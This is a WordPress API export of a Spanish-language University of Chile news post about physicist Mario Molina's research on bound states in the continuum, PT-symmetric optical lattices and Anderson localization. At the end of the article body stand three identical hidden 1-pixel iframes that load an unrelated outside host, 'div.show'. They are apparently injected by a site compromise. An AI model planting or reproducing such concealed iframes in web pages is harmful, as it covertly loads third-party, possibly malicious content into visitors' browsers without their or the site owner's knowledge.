{"id":845,"date":"2023-11-08T15:56:48","date_gmt":"2023-11-08T18:56:48","guid":{"rendered":"https:\/\/dfc.uchile.cl\/inicio\/?p=845"},"modified":"2023-11-08T15:58:03","modified_gmt":"2023-11-08T18:58:03","slug":"estudio-de-fisico-chileno-revela-prometedores-hallazgos-en-cuantica-y-optica","status":"publish","type":"post","link":"https:\/\/dfc.uchile.cl\/inicio\/estudio-de-fisico-chileno-revela-prometedores-hallazgos-en-cuantica-y-optica\/","title":{"rendered":"Estudio de f\u00edsico chileno revela prometedores hallazgos en Cu\u00e1ntica y \u00d3ptica"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-851 alignright\" src=\"https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/MarioMolina-200x300.jpg\" alt=\"\" width=\"200\" height=\"300\" srcset=\"https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/MarioMolina-200x300.jpg 200w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/MarioMolina-150x225.jpg 150w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/MarioMolina-300x450.jpg 300w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/MarioMolina-280x420.jpg 280w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/MarioMolina.jpg 400w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/>Mario Molina, acad\u00e9mico del Departamento de F\u00edsica de la Facultad de Ciencias de la Universidad de Chile lleva a cabo una investigaci\u00f3n pionera donde est\u00e1 explorando nuevas v\u00edas en sistemas cu\u00e1nticos y \u00f3pticos, cuyos hallazgos prometen impactar en tecnolog\u00eda \u00f3ptica, redes el\u00e9ctricas y abrir nuevas perspectivas en campos como la comunicaci\u00f3n, la electr\u00f3nica avanzada y las energ\u00edas renovables.<br \/>\nSu estudio, titulado &#8216;Bound states in the continuum and hermitian and non-hermitian disordered lattices&#8217; (2020-2024), que obtuvo la m\u00e1xima puntuaci\u00f3n en el concurso Fondecyt 2020 en F\u00edsica Te\u00f3rica y Experimental, explor\u00f3 tres \u00e1reas fundamentales de la f\u00edsica cu\u00e1ntica.<br \/>\nEn su investigaci\u00f3n inicial, se enfoc\u00f3 en los <strong>&#8220;estados localizados en el continuo,<\/strong>&#8221; un tema antiguo en la mec\u00e1nica cu\u00e1ntica sobre el cual se postulaba que las part\u00edculas (como los electrones), fuertemente atra\u00eddos a centros atractivos (como sus n\u00facleos at\u00f3micos), ten\u00edan funciones de onda que se extend\u00edan por todo el espacio, formando un espectro continuo de energ\u00eda. Sin embargo, se descubri\u00f3 que era posible crear, manualmente, funciones de onda para part\u00edculas no ligadas a un centro que se &#8220;localizaban&#8221; en regiones espec\u00edficas del espacio, como peque\u00f1as islas en un vasto oc\u00e9ano, debido a fen\u00f3menos de interferencia cu\u00e1ntica.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-849 alignleft\" src=\"https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-300x195.jpg\" alt=\"\" width=\"300\" height=\"195\" srcset=\"https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-300x195.jpg 300w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-1024x664.jpg 1024w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-768x498.jpg 768w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-1536x996.jpg 1536w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-150x97.jpg 150w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-600x389.jpg 600w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-696x451.jpg 696w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-1392x903.jpg 1392w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-1068x693.jpg 1068w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-648x420.jpg 648w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920-1295x840.jpg 1295w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/laser-cut-metal-4373878_1920.jpg 1920w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>El doctor Mario Molina extendi\u00f3 este modelo a sistemas cu\u00e1nticos discretos, como una red el\u00e9ctrica, creando manualmente ejemplos de estos estados localizados, cuyos resultados podr\u00edan tener aplicaciones en dispositivos el\u00e9ctricos. \u201cEn mi proyecto estudi\u00e9 estos estados en una red el\u00e9ctrica bi-inductiva, donde las ondas son ondas de carga el\u00e9ctrica. En este contexto, he podido establecer condiciones para lograr un estado de carga localizado en el espacio. Una posible aplicaci\u00f3n de esto es la creaci\u00f3n de un filtro el\u00e9ctrico capaz de controlar la propagaci\u00f3n de ondas de energ\u00eda espec\u00edficas mediante la modificaci\u00f3n del espaciado entre las unidades el\u00e9ctricas o sus frecuencias resonantes, lo que podr\u00eda ser \u00fatil en diversas aplicaciones tecnol\u00f3gicas\u201d, indica.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-848 alignright\" src=\"https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-300x200.jpg 300w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-1024x682.jpg 1024w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-768x512.jpg 768w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-150x100.jpg 150w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-600x400.jpg 600w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-696x464.jpg 696w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-1068x712.jpg 1068w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-630x420.jpg 630w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280-1260x840.jpg 1260w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/fiber-optic-2749588_1280.jpg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>El segundo resultado del doctor Molina se relaciona con un concepto clave en la mec\u00e1nica cu\u00e1ntica: el Hamiltoniano, un operador que describe c\u00f3mo evolucionan las propiedades f\u00edsicas de un sistema cu\u00e1ntico con el tiempo. Este operador posee una propiedad matem\u00e1tica llamada hermeticidad que asegura que las energ\u00edas sean reales y medibles en el laboratorio. \u201cPor lo tanto, en las bases de la mec\u00e1nica cu\u00e1ntica se instal\u00f3 el concepto de que los Hamiltonianos deb\u00edan ser herm\u00edticos. Esto hasta hace poco cuando surgi\u00f3 la idea de que no es realmente necesario que el Hamiltoniano sea herm\u00edtico, sino que hab\u00eda Hamiltonianos no herm\u00edticos que, sin embargo, son medibles, como los de simetr\u00eda PT. \u201cA la fecha se han estudiado numerosos casos de sistemas con simetr\u00eda PT, buscando aplicaciones para la F\u00edsica a peque\u00f1a escala. En nuestro caso, estudiamos la transmisi\u00f3n de luz a trav\u00e9s de redes \u00f3pticas delgadas, para determinar las condiciones bajo las cuales este transporte de luz es acotado, y de c\u00f3mo podemos controlarlo, lo que podr\u00eda impactar en nuevas tecnolog\u00edas \u00f3pticas.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-846 alignleft\" src=\"https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-300x225.jpg 300w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-1024x768.jpg 1024w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-768x576.jpg 768w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-1536x1152.jpg 1536w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-150x113.jpg 150w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-600x450.jpg 600w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-696x522.jpg 696w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-1392x1044.jpg 1392w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-1068x801.jpg 1068w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-560x420.jpg 560w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-1120x840.jpg 1120w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-80x60.jpg 80w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-160x120.jpg 160w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-265x198.jpg 265w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920-530x396.jpg 530w, https:\/\/dfc.uchile.cl\/inicio\/wp-content\/uploads\/2023\/11\/solar-panels-1726540_1920.jpg 1920w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Finalmente, la investigaci\u00f3n abord\u00f3 la &#8220;localizaci\u00f3n de Anderson&#8221;, que predice que el desorden en un sistema impide la propagaci\u00f3n de se\u00f1ales o part\u00edculas a trav\u00e9s de \u00e9l. El estudio utiliz\u00f3 una red de anillos magn\u00e9ticos, donde cada anillo tiene una frecuencia de resonancia aleatoria. Estos anillos son como \u201cmol\u00e9culas\u201d magn\u00e9ticas creadas en laboratorio con propiedades magn\u00e9ticas especiales. \u201cExploramos implicaciones para la manipulaci\u00f3n de se\u00f1ales magn\u00e9ticas en situaciones desordenadas. Se consideraron dos tipos de desorden: no correlacionado (perfecto) y correlacionado (no perfecto). Se encontr\u00f3 que a\u00fan es posible cierta movilidad en el caso correlacionado, lo que debilita la localizaci\u00f3n de Anderson. Es decir, que a\u00fan podr\u00edamos propagar se\u00f1ales a distancia en ciertos sistemas desordenados, lo que podr\u00eda servir para optimizar el funcionamiento de l\u00e1seres aleatorios o en paneles fotovoltaicos de \u00faltima generaci\u00f3n\u201d, dice el doctor Molina.<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Mario Molina, acad\u00e9mico del Departamento de F\u00edsica de la Facultad de Ciencias de la Universidad de Chile lleva a cabo una investigaci\u00f3n pionera donde est\u00e1 explorando nuevas v\u00edas en sistemas cu\u00e1nticos y \u00f3pticos, cuyos hallazgos prometen impactar en tecnolog\u00eda \u00f3ptica, redes el\u00e9ctricas y abrir nuevas perspectivas en campos como la comunicaci\u00f3n, la electr\u00f3nica avanzada y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":850,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,5],"tags":[],"class_list":["post-845","post","type-post","status-publish","format-standard","has-post-thumbnail","category-featured","category-noticias"],"_links":{"self":[{"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/posts\/845","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/comments?post=845"}],"version-history":[{"count":4,"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/posts\/845\/revisions"}],"predecessor-version":[{"id":855,"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/posts\/845\/revisions\/855"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/media\/850"}],"wp:attachment":[{"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/media?parent=845"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/categories?post=845"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dfc.uchile.cl\/inicio\/wp-json\/wp\/v2\/tags?post=845"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}